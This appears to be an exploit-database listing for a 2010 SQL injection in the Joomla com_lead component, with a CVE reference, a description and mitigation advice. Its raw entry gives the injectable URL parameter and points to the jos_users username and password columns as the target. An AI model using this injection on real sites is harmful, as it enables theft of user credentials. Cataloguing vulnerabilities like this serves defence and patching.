header-logo
Suggest Exploit
vendor:
Leadya Component
by:
ByEge
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Leadya Component
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2010-2067
CPE: a:leadya:leadya_component
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2010

Joomla Component com_lead SQL Injection

An SQL injection vulnerability exists in the Joomla Component com_lead. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands in the back-end database, allowing them to access or modify sensitive data.

Mitigation:

Developers should never construct SQL statements directly from user input. Instead, parameterized statements should be used to avoid SQL injection attacks. Additionally, input validation should be performed to ensure that only expected characters are accepted.
Source

Exploit-DB raw data:

[TR] Title: Joomla Component com_lead SQL Injection 

[TR] Date: 03.06.2010

[TR] Author: ByEge

[TR] Homepage: byege.blogspot.com

[TR] Vendor: http://www.leadya.co.il/

[TR] ExploiT :

[TR] index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' 

[TR] column number : 14 
[TR] column name : username , password
[TR] table name : jos_users

[TR] Th4nks : KaTLiaMCi06 , Fantastik, MitolocyA, ISYAN